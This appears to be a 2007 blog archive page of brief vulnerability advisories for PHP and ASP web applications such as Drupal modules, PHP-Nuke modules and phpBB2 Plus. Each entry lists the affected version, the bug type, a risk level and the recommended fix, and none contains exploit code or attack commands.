Archive

Archive for October, 2007

Drupal Token Module Script Insertion Vulnerability

October 23rd, 2007

Application: Drupal
Affected Version: Drupal Token 4.x / 5.x
Vendor’s URL: Module download site
Bug Type: Cross Site Scripting.
Risk Level: Low

Solution:
Update to version 4.7.x-1.5 or 5.x-1.9 or latest version.

Cross Site Scripting

Artmedic CMS ‘page’ Local File Inclusion

October 23rd, 2007

Application: Artmedic CMS
Affected Version: Artmedic CMS 3.x
Vendor’s URL: Application download site
Bug Type: Exposure of system and sensitive information.
Risk Level: Critical

Solution:
Edit the source code or contact the developer.

File Inclusion

RunCms newbb_plus Vulnerability

October 23rd, 2007

Application: RunCms
Affected Version: RunCms 1.5.2
Vendor’s URL: Application download site
Bug Type: Unknown error been detected.
Risk Level: Critical

Solution:
Update to version 1.5.3 or higher.

Vulnerabilities

LiveAlbum ‘livealbum_dir’ File Inclusion Vulnerability

October 23rd, 2007

Application: LiveAlbum
Affected Version: LiveAlbum 0.9.1
Vendor’s URL: Application download site
Bug Type: Exposure of system and sensitive information.
Risk Level: Critical

Solution:
Edit the source code or contact to developer.

File Inclusion

Stuffed Tracker ‘GLink’ Cross-Site Scripting Vulnerability

October 23rd, 2007

Application: Stuffed Tracker
Affected Version: Stuffed Tracker 2.x
Vendor’s URL: Application download site
Bug Type: Cross Site Scripting.
Risk Level: Low

Solution:
Edit the source code or contact to developer.

Cross Site Scripting

Minki Cross-Site Scripting Vulnerability

October 23rd, 2007

Application: Minki
Affected Version: Minki 1.x
Vendor’s URL: Application download site
Bug Type: Cross Site Scripting.
Risk Level: Low

Solution:
Edit the source code or contact to developer.

Cross Site Scripting

DbList ‘dblisttest.asp’ Multiple Cross-Site Scripting

October 23rd, 2007

Application: DbList
Affected Version: DbList 8.x
Vendor’s URL: Application download site
Bug Type: Cross Site Scripting.
Risk Level: Critical

Solution:
Edit the source code or contact to developer.

Cross Site Scripting

DRBGuestbook ‘action’ Cross-Site Scripting Vulnerability

October 23rd, 2007

Application: DRBGuestbook
Affected Version: DRBGuestbook 1.x
Vendor’s URL: Application download site
Bug Type: Cross Site Scripting.
Risk Level: Low

Solution:
Update to version 1.1.14 or higher version.

Cross Site Scripting

Drupal Project Issue Tracking Module Subscription Form Script Insertion

October 23rd, 2007

Application: Drupal
Affected Version: Drupal Project Issue Tracking Module 4.x / 5.x
Vendor’s URL: Module download site
Bug Type: Cross Site Scripting.
Risk Level: Low

Solution:
Update to version 4.7.x-1.5, 4.7.x-2.5, or 5.x-1.1.

Cross Site Scripting

Original Photo Gallery ‘exif_prog’ Arbitrary Command Execution

October 23rd, 2007

Application: Original Photo Gallery
Affected Version: Original Photo Gallery 0.11.2 and prior version
Vendor’s URL: Application download site
Bug Type: System access bypass remotely.
Risk Level: Critical

Solution:
Update to version 0.11.3.

Access Bypass, Remote Command Execution

PHP-Nuke Dance Music Module Local File Inclusion

October 23rd, 2007

Application: PHP-Nuke
Affected Version: PHP-Nuke Dance Music Module
Vendor’s URL: Module download site
Bug Type: Exposure of system and sensitive information.
Risk Level: Critical

Solution:
Edit the source code or contact module developer.

File Inclusion

SimpGB Multiple Vulberabilities

October 22nd, 2007

Application: SimpGB
Affected Version: SimpGB 1.x
Vendor’s URL: Application download site
Bug Type: Cross Site Scripting, Security Bypass and Exposure of sensitive information.
Risk Level: High

Solution:
Update to latest version.

Access Bypass, Cross Site Scripting

Simple PHP Blog XSS and File Upload Vulnerabilities

October 21st, 2007

Application: Simple PHP Blog
Affected Version: Simple PHP Blog 0.x
Vendor’s URL: Application download site
Bug Type: Cross Site Scripting.
Risk Level: Critical

Solution:
Update to version 0.5.1.

Cross Site Scripting

phpBB2 Plus ‘phpbb_root_path’ Multiple File Inclusion

October 21st, 2007

Application: phpBB2
Affected Version: phpBB2 Plus 1.x
Vendor’s URL: Application download site
Bug Type: Exposure of system and sensitive information.
Risk Level: High

Solution:
Update to version 1.53a released.

File Inclusion

Wordsmith File Inclusion

October 21st, 2007

Application: Wordsmith
Affected Version: Wordsmith 1.x
Vendor’s URL: Application download site
Bug Type: Exposure of system and sensitive information.
Risk Level: High

Solution:
Edit the source code or contact to developer.

File Inclusion

CMS Made Simple Multiple Vulnerabilities

October 21st, 2007

Application: CMS Made Simple
Affected Version: CMS Made Simple 1.x
Vendor’s URL: Application download site
Bug Type: Exposure of system information and Cross Site Scripting
Risk Level: High

Solution:
Update to version 1.1.4.1 .

Access Bypass, Cross Site Scripting

PHP-Nuke Nuke Mobile Entertainment Module Local File Inclusion

October 21st, 2007

Application: Php-Nuke
Affected Version: PHP-Nuke Nuke Mobile Entertainment Module
Vendor’s URL: Module download site
Bug Type: Exposure system and sensitive information
Risk Level: Low

Solution:
Edit the source code or contact to developer.

File Inclusion

PhpGedView Multiple XSS Vulnerabilities

October 21st, 2007

Application: PhpGedView
Affected Version: PhpGedView 4.x
Vendor’s URL: Application download site
Bug Type: Cross Site Scripting
Risk Level: Low

Solution:
Edit the source code or contact to developer.

Cross Site Scripting

Phormer Mulitple Cross Site Scripting

October 21st, 2007

Application: Phormer
Affected Version: Phormer 3.x
Vendor’s URL: Application download site
Bug Type: Cross Site Scripting
Risk Level: Low

Solution:
Edit the source code or contact to developer.

Cross Site Scripting

OneCMS ‘abc’ SQL Injection

October 21st, 2007

Application: OneCMS
Affected Version: OneCMS 2.x
Vendor’s URL: Application download site
Bug Type: SQL Injection
Risk Level: Critical

Solution:
Edit the source code or contact to developer.

SQL Injection